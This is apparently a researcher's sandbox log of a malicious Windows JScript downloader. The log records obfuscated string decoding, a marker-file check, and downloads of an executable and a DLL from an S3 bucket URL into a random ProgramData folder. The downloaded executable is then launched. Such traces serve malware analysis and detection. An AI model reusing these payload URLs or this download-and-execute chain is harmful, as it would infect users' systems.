James_inthe_box

run

Mar 6th, 2018
  1. 6 Mar 17:16:10 - ActiveXObject(WScript.Shell)
  2. 6 Mar 17:16:10 - new WScript.Shell[14]
  3. 6 Mar 17:16:10 - ActiveXObject(Scripting.FileSystemObject)
  4. 6 Mar 17:16:10 - new Scripting.FileSystemObject[15]
  5. 6 Mar 17:16:10 - new DriveObject[16](C:)
  6. 6 Mar 17:16:10 - DriveObject[16](C:).name = (string) 'C:'
  7. 6 Mar 17:16:10 - new Collection[17]
  8. 6 Mar 17:16:10 - Calling unescape() no.: 13
  9. 6 Mar 17:16:10 - Calling unescape() no.: 14
  10. 6 Mar 17:16:10 - Calling unescape() no.: 15
  11. 6 Mar 17:16:10 - Calling unescape() no.: 16
  12. 6 Mar 17:16:10 - Calling unescape() no.: 17
  13. 6 Mar 17:16:10 - Calling unescape() no.: 18
  14. 6 Mar 17:16:10 - Calling unescape() no.: 19
  15. 6 Mar 17:16:10 - Calling unescape() no.: 20
  16. 6 Mar 17:16:10 - Calling unescape() no.: 21
  17. 6 Mar 17:16:10 - Calling unescape() no.: 22
  18. 6 Mar 17:16:10 - Calling unescape() no.: 23
  19. 6 Mar 17:16:10 - Calling unescape() no.: 24
  20. 6 Mar 17:16:10 - Calling unescape() no.: 25
  21. 6 Mar 17:16:10 - Calling unescape() no.: 26
  22. 6 Mar 17:16:10 - Calling unescape() no.: 27
  23. 6 Mar 17:16:10 - Calling unescape() no.: 28
  24. 6 Mar 17:16:10 - Calling unescape() no.: 29
  25. 6 Mar 17:16:10 - Calling unescape() no.: 30
  26. 6 Mar 17:16:10 - Calling unescape() no.: 31
  27. 6 Mar 17:16:10 - Calling unescape() no.: 32
  28. 6 Mar 17:16:10 - Calling unescape() no.: 33
  29. 6 Mar 17:16:10 - Calling unescape() no.: 34
  30. 6 Mar 17:16:10 - Calling unescape() no.: 35
  31. 6 Mar 17:16:10 - Scripting.FileSystemObject[15].FileExists(C:\\ProgramData\\abc123) => false
  32. 6 Mar 17:16:10 - ActiveXObject(Scripting.FileSystemObject)
  33. 6 Mar 17:16:10 - new Scripting.FileSystemObject[18]
  34. 6 Mar 17:16:10 - new DriveObject[19](C:)
  35. 6 Mar 17:16:10 - DriveObject[19](C:).name = (string) 'C:'
  36. 6 Mar 17:16:10 - new Collection[20]
  37. 6 Mar 17:16:10 - Calling unescape() no.: 36
  38. 6 Mar 17:16:10 - Calling unescape() no.: 37
  39. 6 Mar 17:16:10 - Calling unescape() no.: 38
  40. 6 Mar 17:16:10 - Calling unescape() no.: 39
  41. 6 Mar 17:16:10 - Calling unescape() no.: 40
  42. 6 Mar 17:16:10 - Calling unescape() no.: 41
  43. 6 Mar 17:16:10 - Calling unescape() no.: 42
  44. 6 Mar 17:16:10 - Calling unescape() no.: 43
  45. 6 Mar 17:16:10 - Calling unescape() no.: 44
  46. 6 Mar 17:16:10 - Calling unescape() no.: 45
  47. 6 Mar 17:16:10 - Calling unescape() no.: 46
  48. 6 Mar 17:16:10 - Calling unescape() no.: 47
  49. 6 Mar 17:16:10 - Calling unescape() no.: 48
  50. 6 Mar 17:16:10 - Calling unescape() no.: 49
  51. 6 Mar 17:16:10 - Calling unescape() no.: 50
  52. 6 Mar 17:16:10 - Calling unescape() no.: 51
  53. 6 Mar 17:16:10 - Calling unescape() no.: 52
  54. 6 Mar 17:16:10 - Scripting.FileSystemObject[18].CreateFolder(C:\\ProgramData\\JQD2T4NFOFL9BW1)
  55. 6 Mar 17:16:10 - new FolderObject[21](C:\\ProgramData\\JQD2T4NFOFL9BW1)
  56. 6 Mar 17:16:10 - FolderObject[21](C:\\ProgramData\\JQD2T4NFOFL9BW1).name = (string) 'C:\\ProgramData\\JQD2T4NFOFL9BW1'
  57. 6 Mar 17:16:10 - FolderObject[21](C:\\ProgramData\\JQD2T4NFOFL9BW1).parentfolder = (string) 'C:\ProgramData'
  58. 6 Mar 17:16:10 - ActiveXObject(Scripting.FileSystemObject)
  59. 6 Mar 17:16:10 - new Scripting.FileSystemObject[22]
  60. 6 Mar 17:16:10 - new DriveObject[23](C:)
  61. 6 Mar 17:16:10 - DriveObject[23](C:).name = (string) 'C:'
  62. 6 Mar 17:16:10 - new Collection[24]
  63. 6 Mar 17:16:10 - Calling unescape() no.: 53
  64. 6 Mar 17:16:10 - Calling unescape() no.: 54
  65. 6 Mar 17:16:10 - Calling unescape() no.: 55
  66. 6 Mar 17:16:10 - Calling unescape() no.: 56
  67. 6 Mar 17:16:10 - Calling unescape() no.: 57
  68. 6 Mar 17:16:10 - Calling unescape() no.: 58
  69. 6 Mar 17:16:10 - Calling unescape() no.: 59
  70. 6 Mar 17:16:10 - Calling unescape() no.: 60
  71. 6 Mar 17:16:10 - Calling unescape() no.: 61
  72. 6 Mar 17:16:10 - Calling unescape() no.: 62
  73. 6 Mar 17:16:10 - Calling unescape() no.: 63
  74. 6 Mar 17:16:10 - Calling unescape() no.: 64
  75. 6 Mar 17:16:10 - Calling unescape() no.: 65
  76. 6 Mar 17:16:10 - Calling unescape() no.: 66
  77. 6 Mar 17:16:10 - Calling unescape() no.: 67
  78. 6 Mar 17:16:10 - Calling unescape() no.: 68
  79. 6 Mar 17:16:10 - Calling unescape() no.: 69
  80. 6 Mar 17:16:10 - Calling unescape() no.: 70
  81. 6 Mar 17:16:10 - Calling unescape() no.: 71
  82. 6 Mar 17:16:10 - Calling unescape() no.: 72
  83. 6 Mar 17:16:10 - Calling unescape() no.: 73
  84. 6 Mar 17:16:10 - Calling unescape() no.: 74
  85. 6 Mar 17:16:10 - Calling unescape() no.: 75
  86. 6 Mar 17:16:10 - Scripting.FileSystemObject[22].CreateTextFile(C:\\ProgramData\\abc123)
  87. 6 Mar 17:16:10 - new TextStream[25]
  88. 6 Mar 17:16:10 - TextStream[25].WriteLine(kroicf)
  89. 6 Mar 17:16:10 - FS.writeFile(C:\\ProgramData\\abc123, kroicf??)
  90. 6 Mar 17:16:10 - TextStream[25].Close()
  91. 6 Mar 17:16:10 - Calling unescape() no.: 76
  92. 6 Mar 17:16:10 - Calling unescape() no.: 77
  93. 6 Mar 17:16:10 - Calling unescape() no.: 78
  94. 6 Mar 17:16:10 - Calling unescape() no.: 79
  95. 6 Mar 17:16:10 - Calling unescape() no.: 80
  96. 6 Mar 17:16:10 - Calling unescape() no.: 81
  97. 6 Mar 17:16:10 - Calling unescape() no.: 82
  98. 6 Mar 17:16:10 - Calling unescape() no.: 83
  99. 6 Mar 17:16:10 - Calling unescape() no.: 84
  100. 6 Mar 17:16:10 - Calling unescape() no.: 85
  101. 6 Mar 17:16:10 - Calling unescape() no.: 86
  102. 6 Mar 17:16:10 - Calling unescape() no.: 87
  103. 6 Mar 17:16:10 - Calling unescape() no.: 88
  104. 6 Mar 17:16:10 - Calling unescape() no.: 89
  105. 6 Mar 17:16:10 - Calling unescape() no.: 90
  106. 6 Mar 17:16:10 - Calling unescape() no.: 91
  107. 6 Mar 17:16:10 - Calling unescape() no.: 92
  108. 6 Mar 17:16:10 - Calling unescape() no.: 93
  109. 6 Mar 17:16:10 - Calling unescape() no.: 94
  110. 6 Mar 17:16:10 - Calling unescape() no.: 95
  111. 6 Mar 17:16:10 - Calling unescape() no.: 96
  112. 6 Mar 17:16:10 - Calling unescape() no.: 97
  113. 6 Mar 17:16:10 - Calling unescape() no.: 98
  114. 6 Mar 17:16:10 - Calling unescape() no.: 99
  115. 6 Mar 17:16:10 - Calling unescape() no.: 100
  116. 6 Mar 17:16:10 - Calling unescape() no.: 101
  117. 6 Mar 17:16:10 - Calling unescape() no.: 102
  118. 6 Mar 17:16:10 - Calling unescape() no.: 103
  119. 6 Mar 17:16:10 - Calling unescape() no.: 104
  120. 6 Mar 17:16:10 - Calling unescape() no.: 105
  121. 6 Mar 17:16:10 - Calling unescape() no.: 106
  122. 6 Mar 17:16:10 - Calling unescape() no.: 107
  123. 6 Mar 17:16:10 - Calling unescape() no.: 108
  124. 6 Mar 17:16:10 - Calling unescape() no.: 109
  125. 6 Mar 17:16:10 - Calling unescape() no.: 110
  126. 6 Mar 17:16:10 - Calling unescape() no.: 111
  127. 6 Mar 17:16:10 - Calling unescape() no.: 112
  128. 6 Mar 17:16:10 - Calling unescape() no.: 113
  129. 6 Mar 17:16:10 - Calling unescape() no.: 114
  130. 6 Mar 17:16:10 - Calling unescape() no.: 115
  131. 6 Mar 17:16:10 - Calling unescape() no.: 116
  132. 6 Mar 17:16:10 - Calling unescape() no.: 117
  133. 6 Mar 17:16:10 - Calling unescape() no.: 118
  134. 6 Mar 17:16:10 - Calling unescape() no.: 119
  135. 6 Mar 17:16:10 - Calling unescape() no.: 120
  136. 6 Mar 17:16:10 - Calling unescape() no.: 121
  137. 6 Mar 17:16:10 - Calling unescape() no.: 122
  138. 6 Mar 17:16:10 - Calling unescape() no.: 123
  139. 6 Mar 17:16:10 - Calling unescape() no.: 124
  140. 6 Mar 17:16:10 - Calling unescape() no.: 125
  141. 6 Mar 17:16:10 - Calling unescape() no.: 126
  142. 6 Mar 17:16:10 - Calling unescape() no.: 127
  143. 6 Mar 17:16:10 - Calling unescape() no.: 128
  144. 6 Mar 17:16:10 - Calling unescape() no.: 129
  145. 6 Mar 17:16:10 - Calling unescape() no.: 130
  146. 6 Mar 17:16:10 - Calling unescape() no.: 131
  147. 6 Mar 17:16:10 - Calling unescape() no.: 132
  148. 6 Mar 17:16:10 - Calling unescape() no.: 133
  149. 6 Mar 17:16:10 - Calling unescape() no.: 134
  150. 6 Mar 17:16:10 - Calling unescape() no.: 135
  151. 6 Mar 17:16:10 - Calling unescape() no.: 136
  152. 6 Mar 17:16:10 - Calling unescape() no.: 137
  153. 6 Mar 17:16:10 - Calling unescape() no.: 138
  154. 6 Mar 17:16:10 - Calling unescape() no.: 139
  155. 6 Mar 17:16:10 - Calling unescape() no.: 140
  156. 6 Mar 17:16:10 - Calling unescape() no.: 141
  157. 6 Mar 17:16:10 - Calling unescape() no.: 142
  158. 6 Mar 17:16:10 - Calling unescape() no.: 143
  159. 6 Mar 17:16:10 - Calling unescape() no.: 144
  160. 6 Mar 17:16:10 - Calling unescape() no.: 145
  161. 6 Mar 17:16:10 - Calling unescape() no.: 146
  162. 6 Mar 17:16:10 - Calling unescape() no.: 147
  163. 6 Mar 17:16:10 - Calling unescape() no.: 148
  164. 6 Mar 17:16:10 - Calling unescape() no.: 149
  165. 6 Mar 17:16:10 - Calling unescape() no.: 150
  166. 6 Mar 17:16:10 - ActiveXObject(MSXML2.XMLHTTP)
  167. 6 Mar 17:16:10 - new MSXML2.XMLHTTP[26]
  168. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].onreadystatechange = (undefined) 'undefined'
  169. 6 Mar 17:16:10 - ActiveXObject(ADODB.Stream)
  170. 6 Mar 17:16:10 - new ADODB_Stream[27]
  171. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].open(GET,https://s3.us-east-2.amazonaws.com/novapasta/suhhuruxp.guh,false)
  172. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].method = (string) 'GET'
  173. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].url = (string) 'https://s3.us-east-2.amazonaws.com/novapasta/suhhuruxp.guh'
  174. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].async = (boolean) 'false'
  175. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].send(undefined)
  176. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].method.get() => (string) 'GET'
  177. 6 Mar 17:16:10 - MSXML2.XMLHTTP[26].url.get() => (string) 'https://s3.us-east-2.amazonaws.com/novapasta/suhhuruxp.guh'
  178. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].status = (number) '200'
  179. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].readystate = (number) '4'
  180. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].statustext = (string) 'OK'
  181. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].responsebody = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
  182. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].allresponseheaders = (string) '{"x-amz-id-2":"z4XbaGhj9GJeqg2jpZZQqHDd0EtBewWX8a3SZJ66YcaX+1nsSWY+5Gc9QmtnggdNdr7XkulFQRU=","x-amz-request-id":"0264C3DA31459C4A","date":"Wed, 07 Mar 2018 00:16:17 GMT","last-modified":"Tue, 06 Mar 2018 00:14:17 GMT","etag":"\"b2218df5c3373a9a1b619e ... (truncated)'
  183. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].status.get() => (number) '200'
  184. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].allresponseheaders.get() => (string) '{"x-amz-id-2":"z4XbaGhj9GJeqg2jpZZQqHDd0EtBewWX8a3SZJ66YcaX+1nsSWY+5Gc9QmtnggdNdr7XkulFQRU=","x-amz-request-id":"0264C3DA31459C4A","date":"Wed, 07 Mar 2018 00:16:17 GMT","last-modified":"Tue, 06 Mar 2018 00:14:17 GMT","etag":"\"b2218df5c3373a9a1b619e ... (truncated)'
  185. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
  186. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].statustext.get() => (string) 'OK'
  187. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].onreadystatechange.get() => (undefined) 'undefined'
  188. 6 Mar 17:16:17 - ADODB_Stream[27].type = (number) '1'
  189. 6 Mar 17:16:17 - ADODB_Stream[27].Open()
  190. 6 Mar 17:16:17 - MSXML2.XMLHTTP[26].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
  191. 6 Mar 17:16:17 - ADODB_Stream[27].content = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
  192. 6 Mar 17:16:17 - ADODB_Stream[27].Write(str) - 400872 bytes
  193. 6 Mar 17:16:17 - ADODB_Stream[27].size = (number) '400872'
  194. 6 Mar 17:16:17 - ADODB_Stream[27].SaveToFile(C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe, 2)
  195. 6 Mar 17:16:17 - ADODB_Stream[27].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$??????????|?}?/?}?/?}?/V2V/?}?/??S/?}?/?}?/?|?/??U/?}?/??D/?}?/??C/C}?/??Z/?}?/??]/?}?/Rich?}?/????????PE??L???'??Y?????????????? ... (truncated)'
  196. 6 Mar 17:16:17 - Calling unescape() no.: 151
  197. 6 Mar 17:16:17 - Calling unescape() no.: 152
  198. 6 Mar 17:16:17 - Calling unescape() no.: 153
  199. 6 Mar 17:16:17 - Calling unescape() no.: 154
  200. 6 Mar 17:16:17 - Calling unescape() no.: 155
  201. 6 Mar 17:16:17 - Calling unescape() no.: 156
  202. 6 Mar 17:16:17 - Calling unescape() no.: 157
  203. 6 Mar 17:16:17 - Calling unescape() no.: 158
  204. 6 Mar 17:16:17 - Calling unescape() no.: 159
  205. 6 Mar 17:16:17 - Calling unescape() no.: 160
  206. 6 Mar 17:16:17 - Calling unescape() no.: 161
  207. 6 Mar 17:16:17 - Calling unescape() no.: 162
  208. 6 Mar 17:16:17 - Calling unescape() no.: 163
  209. 6 Mar 17:16:17 - Calling unescape() no.: 164
  210. 6 Mar 17:16:17 - Calling unescape() no.: 165
  211. 6 Mar 17:16:17 - Calling unescape() no.: 166
  212. 6 Mar 17:16:17 - Calling unescape() no.: 167
  213. 6 Mar 17:16:17 - Calling unescape() no.: 168
  214. 6 Mar 17:16:17 - Calling unescape() no.: 169
  215. 6 Mar 17:16:17 - Calling unescape() no.: 170
  216. 6 Mar 17:16:17 - Calling unescape() no.: 171
  217. 6 Mar 17:16:17 - Calling unescape() no.: 172
  218. 6 Mar 17:16:17 - Calling unescape() no.: 173
  219. 6 Mar 17:16:17 - Calling unescape() no.: 174
  220. 6 Mar 17:16:17 - Calling unescape() no.: 175
  221. 6 Mar 17:16:17 - Calling unescape() no.: 176
  222. 6 Mar 17:16:17 - Calling unescape() no.: 177
  223. 6 Mar 17:16:17 - Calling unescape() no.: 178
  224. 6 Mar 17:16:17 - Calling unescape() no.: 179
  225. 6 Mar 17:16:17 - Calling unescape() no.: 180
  226. 6 Mar 17:16:17 - Calling unescape() no.: 181
  227. 6 Mar 17:16:17 - Calling unescape() no.: 182
  228. 6 Mar 17:16:17 - Calling unescape() no.: 183
  229. 6 Mar 17:16:17 - Calling unescape() no.: 184
  230. 6 Mar 17:16:17 - Calling unescape() no.: 185
  231. 6 Mar 17:16:17 - Calling unescape() no.: 186
  232. 6 Mar 17:16:17 - Calling unescape() no.: 187
  233. 6 Mar 17:16:17 - Calling unescape() no.: 188
  234. 6 Mar 17:16:17 - Calling unescape() no.: 189
  235. 6 Mar 17:16:17 - Calling unescape() no.: 190
  236. 6 Mar 17:16:17 - Calling unescape() no.: 191
  237. 6 Mar 17:16:17 - Calling unescape() no.: 192
  238. 6 Mar 17:16:17 - Calling unescape() no.: 193
  239. 6 Mar 17:16:17 - Calling unescape() no.: 194
  240. 6 Mar 17:16:17 - Calling unescape() no.: 195
  241. 6 Mar 17:16:17 - Calling unescape() no.: 196
  242. 6 Mar 17:16:17 - Calling unescape() no.: 197
  243. 6 Mar 17:16:17 - Calling unescape() no.: 198
  244. 6 Mar 17:16:17 - Calling unescape() no.: 199
  245. 6 Mar 17:16:17 - Calling unescape() no.: 200
  246. 6 Mar 17:16:17 - Calling unescape() no.: 201
  247. 6 Mar 17:16:17 - Calling unescape() no.: 202
  248. 6 Mar 17:16:17 - Calling unescape() no.: 203
  249. 6 Mar 17:16:17 - Calling unescape() no.: 204
  250. 6 Mar 17:16:17 - Calling unescape() no.: 205
  251. 6 Mar 17:16:17 - Calling unescape() no.: 206
  252. 6 Mar 17:16:17 - Calling unescape() no.: 207
  253. 6 Mar 17:16:17 - Calling unescape() no.: 208
  254. 6 Mar 17:16:17 - Calling unescape() no.: 209
  255. 6 Mar 17:16:17 - Calling unescape() no.: 210
  256. 6 Mar 17:16:17 - Calling unescape() no.: 211
  257. 6 Mar 17:16:17 - Calling unescape() no.: 212
  258. 6 Mar 17:16:17 - Calling unescape() no.: 213
  259. 6 Mar 17:16:17 - Calling unescape() no.: 214
  260. 6 Mar 17:16:17 - Calling unescape() no.: 215
  261. 6 Mar 17:16:17 - Calling unescape() no.: 216
  262. 6 Mar 17:16:17 - Calling unescape() no.: 217
  263. 6 Mar 17:16:17 - Calling unescape() no.: 218
  264. 6 Mar 17:16:17 - Calling unescape() no.: 219
  265. 6 Mar 17:16:17 - Calling unescape() no.: 220
  266. 6 Mar 17:16:17 - Calling unescape() no.: 221
  267. 6 Mar 17:16:17 - Calling unescape() no.: 222
  268. 6 Mar 17:16:17 - Calling unescape() no.: 223
  269. 6 Mar 17:16:17 - Calling unescape() no.: 224
  270. 6 Mar 17:16:17 - Calling unescape() no.: 225
  271. 6 Mar 17:16:17 - ActiveXObject(MSXML2.XMLHTTP)
  272. 6 Mar 17:16:17 - new MSXML2.XMLHTTP[28]
  273. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].onreadystatechange = (undefined) 'undefined'
  274. 6 Mar 17:16:17 - ActiveXObject(ADODB.Stream)
  275. 6 Mar 17:16:17 - new ADODB_Stream[29]
  276. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].open(GET,https://s3.us-east-2.amazonaws.com/novapasta/wickaputs.cus,false)
  277. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].method = (string) 'GET'
  278. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].url = (string) 'https://s3.us-east-2.amazonaws.com/novapasta/wickaputs.cus'
  279. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].async = (boolean) 'false'
  280. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].send(undefined)
  281. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].method.get() => (string) 'GET'
  282. 6 Mar 17:16:17 - MSXML2.XMLHTTP[28].url.get() => (string) 'https://s3.us-east-2.amazonaws.com/novapasta/wickaputs.cus'
  283. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].status = (number) '200'
  284. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].readystate = (number) '4'
  285. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].statustext = (string) 'OK'
  286. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].responsebody = (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
  287. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].allresponseheaders = (string) '{"x-amz-id-2":"twVm2lIBGZ3UZSE9E1SG3m9RxkoYZVBO/ip2rEEg0v9tveF7/GfBr2bRUJAs8EC6uuqaVnm/lfg=","x-amz-request-id":"3AD72BAB32268C37","date":"Wed, 07 Mar 2018 00:16:21 GMT","last-modified":"Tue, 06 Mar 2018 00:11:11 GMT","etag":"\"12b0eef551ecc5209fc31b ... (truncated)'
  288. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].status.get() => (number) '200'
  289. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].allresponseheaders.get() => (string) '{"x-amz-id-2":"twVm2lIBGZ3UZSE9E1SG3m9RxkoYZVBO/ip2rEEg0v9tveF7/GfBr2bRUJAs8EC6uuqaVnm/lfg=","x-amz-request-id":"3AD72BAB32268C37","date":"Wed, 07 Mar 2018 00:16:21 GMT","last-modified":"Tue, 06 Mar 2018 00:11:11 GMT","etag":"\"12b0eef551ecc5209fc31b ... (truncated)'
  290. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].responsebody.get() => (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
  291. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].statustext.get() => (string) 'OK'
  292. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].onreadystatechange.get() => (undefined) 'undefined'
  293. 6 Mar 17:16:36 - ADODB_Stream[29].type = (number) '1'
  294. 6 Mar 17:16:36 - ADODB_Stream[29].Open()
  295. 6 Mar 17:16:36 - MSXML2.XMLHTTP[28].responsebody.get() => (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
  296. 6 Mar 17:16:37 - ADODB_Stream[29].content = (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
  297. 6 Mar 17:16:37 - ADODB_Stream[29].Write(str) - 5845088 bytes
  298. 6 Mar 17:16:37 - ADODB_Stream[29].size = (number) '5845088'
  299. 6 Mar 17:16:37 - ADODB_Stream[29].SaveToFile(C:\\ProgramData\\JQD2T4NFOFL9BW1\shfolder.dll, 2)
  300. 6 Mar 17:16:37 - ADODB_Stream[29].content.get() => (object) 'MZP?????????????????????@???????????????????????????????????????????????!??L?!??This program must be run under Win32??$7?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ... (truncated)'
  301. 6 Mar 17:16:37 - WScript.Sleep(11000)
  302. 6 Mar 17:16:48 - ActiveXObject(WScript.Shell)
  303. 6 Mar 17:16:48 - new WScript.Shell[30]
  304. 6 Mar 17:16:48 - Calling unescape() no.: 226
  305. 6 Mar 17:16:48 - Calling unescape() no.: 227
  306. 6 Mar 17:16:48 - Calling unescape() no.: 228
  307. 6 Mar 17:16:48 - Calling unescape() no.: 229
  308. 6 Mar 17:16:48 - Calling unescape() no.: 230
  309. 6 Mar 17:16:48 - Calling unescape() no.: 231
  310. 6 Mar 17:16:48 - Calling unescape() no.: 232
  311. 6 Mar 17:16:48 - Calling unescape() no.: 233
  312. 6 Mar 17:16:48 - Calling unescape() no.: 234
  313. 6 Mar 17:16:48 - Calling unescape() no.: 235
  314. 6 Mar 17:16:48 - Calling unescape() no.: 236
  315. 6 Mar 17:16:48 - Calling unescape() no.: 237
  316. 6 Mar 17:16:48 - Calling unescape() no.: 238
  317. 6 Mar 17:16:48 - Calling unescape() no.: 239
  318. 6 Mar 17:16:48 - Calling unescape() no.: 240
  319. 6 Mar 17:16:48 - Calling unescape() no.: 241
  320. 6 Mar 17:16:48 - Calling unescape() no.: 242
  321. 6 Mar 17:16:48 - Calling unescape() no.: 243
  322. 6 Mar 17:16:48 - WScript.Shell[30].Exec(C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe )
  323. 6 Mar 17:16:48 - new Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe )
  324. 6 Mar 17:16:48 - Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe ).processid = (number) '31'
  325. 6 Mar 17:16:48 - new TextStream[32]
  326. 6 Mar 17:16:48 - Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe ).stdout = (object) 'TextStream[32]'
  327. 6 Mar 17:16:48 - new TextStream[33]
  328. 6 Mar 17:16:48 - Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe ).stderr = (object) 'TextStream[33]'
  329. 6 Mar 17:16:48 - new TextStream[34]
  330. 6 Mar 17:16:48 - Process[31](C:\\ProgramData\\JQD2T4NFOFL9BW1\NBHUNM59BUI0MUU.exe ).stdin = (object) 'TextStream[34]'
  331. 6 Mar 17:16:48 - ==> Cleaning up sandbox.
  332. 6 Mar 17:16:48 - ==> Script execution finished, dumping sandbox environment to a file.